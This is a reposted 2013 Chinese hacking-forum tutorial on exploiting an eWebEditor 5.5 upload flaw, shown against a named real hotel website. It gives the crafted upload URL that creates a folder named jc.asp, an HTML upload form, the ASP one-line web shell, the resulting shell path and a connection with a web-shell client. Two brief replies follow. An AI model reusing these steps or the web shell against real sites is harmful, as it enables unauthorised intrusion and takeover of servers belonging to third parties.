查看: 17633|回复: 2

ewebeditor 5.5漏洞利用【转载】

[复制链接]
  • TA的每日心情

    2020-10-2 23:00
  • 签到天数: 10 天

    [LV.3]偶尔看看II

    发表于 2013-9-2 09:47:28 | 显示全部楼层 |阅读模式
    目标站:http://www.sz-hotel.com/

    网站的注入、猜帐号密码、找后台、这些不是本文重点就此略过。
    此网站的ewebeditor 是5.5的
    QQ截图20130902094027.jpg
    在百度搜索ewebeditor 5.5的漏洞就能找到相关的漏洞详情。

    先访问这个地址:
    Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=weibao.asp
    访问这个地址可以建立个weibao.ASP的文件夹……
    再用这个html代码上传。

    1. <form action="地址/path/upload.asp?action=save&type=&style=样式名" method=post name=myform enctype="multipart/form-data">
    2. <input type=file name=uploadfile size=1 style="width:100%">
    3. <input type=submit value="上传了"></input>
    4. </form>
    复制代码
    本地提交了一个图片小马,返回空白页面,查看源码,得到小马路径。还是IIS解析漏洞~
    对6.X的也管用,对ASP。aspx。JSP。均管用。


    在此之前我先确定了ewebeditor 5.5所在的地址:

    http://www.sz-hotel.com/admin/myeWebEditor/

    PS:转入地址将会列目录。

    得到漏洞地址为:
    1. http://www.sz-hotel.com/admin/myeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=jc.asp
    复制代码
    访问这个地址可以建立个jc.asp的文件夹
    QQ截图20130902094229.jpg
    在uploadfile文件目录下。因为上传的图片就在此文件下。

    这样我们可以利用解析漏洞对文件夹上传图片。

    在本地构架一个上传页面,代码是:

    1. <form action="地址/path/upload.asp?action=save&type=&style=样式名" method=post name=myform enctype="multipart/form-data">
    2. <input type=file name=uploadfile size=1 style="width:100%">
    3. <input type=submit value="上传了"></input>
    4. </form>
    复制代码
    QQ截图20130902094336.jpg
    将这一段代码换成我们的漏洞地址:
    /path/upload.asp?action=save&type=&style=样式名
    换成:
    1. http://www.sz-hotel.com/admin/myeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=jc.asp
    复制代码
    好,把文件的后缀变成htm,后打开。
    QQ截图20130902094435.jpg
    上传图片网马小马大马都可以,但是上传大马因为他有一个保护措施,所以我这里就不上传大马了,上传一句话。

    随便找一句话:
    1. <%eval request("pass")%>
    复制代码
    新建立一个文档,输入此一句话,然后保存为jpg后缀。
    QQ截图20130902094522.jpg
    上传之后就变成空白了,然后右键查看源代码。
    QQ截图20130902094547.jpg
    此地址就是网马的所在地址:
    1. http://www.sz-hotel.com/uploadfile/jc.asp/201307/20130726215332219.jpg
    复制代码
    菜刀链接
    QQ截图20130902094628.jpg

    作者:Syonk  forum f4ck

    评分

    参与人数 1i币 +4 收起 理由
    90_ + 4

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    开心
    2020-4-29 10:22
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2013-9-2 21:33:04 | 显示全部楼层
    看起来和xycms的一个漏洞差不多
    回复 支持 反对

    使用道具 举报

    badboy 该用户已被删除
    发表于 2013-10-19 19:10:41 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-18 13:43 , Processed in 0.052155 second(s), 21 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部